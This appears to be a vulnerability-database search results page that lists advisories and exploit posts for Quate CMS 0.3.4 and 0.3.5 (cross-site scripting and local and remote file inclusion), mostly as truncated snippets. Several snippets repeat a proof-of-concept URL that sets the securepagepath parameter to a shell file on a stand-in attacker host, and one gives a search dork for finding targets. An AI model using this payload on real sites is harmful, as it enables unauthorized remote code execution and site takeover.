27 matches found
EUVD-2008-2491
Malware in sbrugna...
Quate CMS 0.3.4 Multiple Cross-Site Scripting Vulnerabilities
No description provided by source...
quate cms <= 0.3.5 (rfi/lfi) Multiple Vulnerabilities
No description provided by source. Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg Quate CMS = 0.3.5 RFI/LFI Multiple Remote Vulnerability Download Script : http://quate.net/quatecms Dork : dielamers attempt; :P Vuln RFI : ./QuateCMS035/admin/includes/header.php line 27 ?php if $bypassrestrict !...
quate cms 0.3.4 lfi Multiple Vulnerabilities
No description provided by source...
Quate CMS 0.3.5 - LocalRemote File Inclusion
Quate CMS 0.3.5 - LocalRemote File Inclusion Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg Quate CMS PoC : http://target/path/admin/includes/header.php?securepagepath=http://attacker/shell.txt??? Vuln LFI : ./QuateCMS035/admin/includes/footer.php line 4 PoC :...
Quate CMS 0.3.5 Local / Remote File Inclusion
Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg Quate CMS PoC : http://target/path/admin/includes/header.php?securepagepath=http://attacker/shell.txt??? Vuln LFI : ./QuateCMS035/admin/includes/footer.php line 4 PoC :...
Quate CMS 0.3.5 - Local/Remote File Inclusion
Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg Quate CMS PoC : http://target/path/admin/includes/header.php?securepagepath=http://attacker/shell.txt??? Vuln LFI : ./QuateCMS035/admin/includes/footer.php line 4 PoC :...
Quate CMS <= 0.3.5 (RFI/LFI) Multiple Remote Vulnerabilities
Exploit for unknown platform in category web applications ============================================================ Quate CMS PoC : http://target/path/admin/includes/header.php?securepagepath=http://attacker/shell.txt??? Vuln LFI : ./QuateCMS035/admin/includes/footer.php line 4 PoC :...
Quate CMS <= 0.3.5 (RFI/LFI) Multiple Remote Vulnerabilities
No description provided by source. Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg Quate CMS = 0.3.5 RFI/LFI Multiple Remote Vulnerability Download Script : http://quate.net/quatecms Dork : die"lamers attempt"; :P Vuln RFI : ./QuateCMS035/admin/includes/header.php line 27 ?php if $bypassrestrict...
Quate CMS 0.3.4 footer.php/header.php(LFI/XSS) Multiple Remote Vulnerabilities
No description provided by source. ┌┌───────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rise...
Quate CMS 0.3.4 (LFI/XSS) Multiple Remote Vulnerabilities
Exploit for unknown platform in category web applications ========================================================= Quate CMS 0.3.4 LFI/XSS Multiple Remote Vulnerabilities =========================================================...
Quate CMS 0.3.4 (XSS) Remote Vulnerabilities
No description provided by source...
Quate CMS 0.3.4 - Local File Inclusion Cross-Site Scripting
Quate CMS 0.3.4 - Local File Inclusion Cross-Site Scripting ??????????????????????????????????????????????????????????????????????????????? ?? C r a C k E r ?? ?? T H E C R A C K O F E T E R N A L M I G H T ?? ?????????????????????????????????????????????????????????????????????????????? ????? Fr...
Quate CMS 0.3.4 - Local File Inclusion / Cross-Site Scripting
??????????????????????????????????????????????????????????????????????????????? ?? C r a C k E r ?? ?? T H E C R A C K O F E T E R N A L M I G H T ?? ?????????????????????????????????????????????????????????????????????????????? ????? From The Ashes and Dust Rises An Unimaginable crack.... ?????...
quatecms-lfixss.txt
┌┌───────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐...
Quate CMS 0.3.4 - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/30570/info Quate CMS is prone to multiple cross-site scripting vulnerabilities because it fails to adequately sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in th...
Quate CMS多个输入验证漏洞
BUGTRAQ ID: 29348 Quate CMS是运行在PHP和MySQL上的网站内容管理系统。 Quate CMS的多个模块没有正确验证用户提供的输入,可能导致跨站脚本攻击、泄露敏感信息或入侵有漏洞的系统。 1 当bypassinstalled设置为1的时候,admin/includes/header.php文件中没有正确地验证对securepagepath参数的输入便用于包含文件: if $bypassinstalled != 1 if !isfile"../includes/installed" ... require"../includes/simplegui.php";...
Cross site scripting
Multiple cross-site scripting XSS vulnerabilities in Quate CMS 0.3.4 allow remote attackers to inject arbitrary web script or HTML via the PATHINFO to 1 index.php, 2 login.php, and 3 credits.php in admin/, and 4 upgrade/index.php...
CVE-2008-2496
Multiple cross-site scripting XSS vulnerabilities in Quate CMS 0.3.4 allow remote attackers to inject arbitrary web script or HTML via the PATHINFO to 1 index.php, 2 login.php, and 3 credits.php in admin/, and 4 upgrade/index.php...
CVE-2008-2496
CVE-2008-2496 : The provided documents indicate multiple cross-site scripting (XSS) vulnerabilities in Quate CMS 0.3.4. The affected component is the admin area, with input vectors via PATH_INFO in four PHP pages: index.php, login.php, credits.php, and upgrade/index.php. The vulnerability type is...